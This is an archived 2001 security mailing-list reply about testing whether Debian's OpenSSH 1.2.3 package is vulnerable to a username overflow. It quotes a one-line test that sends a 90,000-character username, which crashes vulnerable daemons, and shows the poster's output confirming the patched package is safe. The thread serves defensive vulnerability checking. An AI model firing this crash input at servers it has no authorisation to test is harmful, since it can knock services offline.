On Tue, 4 Dec 2001 17:16:22 -0500 (EST) Michal Zalewski <lcamtufat_private> wrote: > On Tue, 4 Dec 2001, Jason Baker wrote: > > > I took a quick look around and didn't see the exploit code, is there > > anyone who can confirm if debian with ssh 1:1.2.3-9.2 is vulnerable? > > (Or point me at the exploit and I'll test myself) > > You can test for the vulnerability in rather trivial way, as described in > our original advisory. You need to use OpenSSH client that does not > truncate usernames, and then try the following: > > ssh -l`perl -e '{print "A"x90000}'` someserver -v > > If the connection is dropped with no error message (and the daemon dies > with signal 11) after establishing a connection and exchanging keys but > before password prompt, you are vulnerable. If it gives you password > prompt, you are not vulnerable. Thanks for the handy test! I can confirm that the *updated* debian package with SSH-1.5-OpenSSH-1.2.3 in not vulnerable: bluebottle:~ >ssh -l`perl -e '{print "A"x90000}'` 130.216.yyy.xxx Word too long. bluebottle:~ >src/scanssh/scanssh 130.216.yyy.xxx 130.216.yyy.xxx SSH-1.5-OpenSSH-1.2.3 Russell Fulton, Computer and Network Security Officer The University of Auckland, New Zealand ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Tue Dec 04 2001 - 21:07:40 PST